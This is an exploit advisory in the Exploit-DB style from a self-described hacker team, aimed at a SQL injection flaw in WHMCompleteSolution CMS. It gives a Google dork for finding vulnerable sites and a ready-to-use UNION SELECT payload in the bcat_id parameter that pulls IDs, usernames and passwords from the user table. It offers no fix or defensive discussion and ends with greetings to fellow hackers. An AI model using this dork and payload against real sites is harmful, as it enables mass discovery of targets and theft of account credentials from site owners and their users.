ALGERIAN HACKER **********************- NORTH-AFRICA SECURITY TEAM -*********************** [!] WHMCompleteSolution CMS sql Injection Vulnerability [!] Author : Dr.0rYX and Cr3w-DZ [!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.siamhostserver.com/whmcs/ [+] script : WHMCompleteSolution CMS [+] Download : http://www.siamhostserver.com/whmcs/ (sell script) [+] Vulnerability : php SQL injection [+] Dork :inurl:"weblink_cat_list.php?bcat_id=" **************************************************************************/ [ Vulnerable File ] http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ] [ Exploit ] http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user [ GReets ] [+] :CLAW , le0n , HIS0K4 , WWW.exploit-db.com , ALL HACKERS MUSLIMS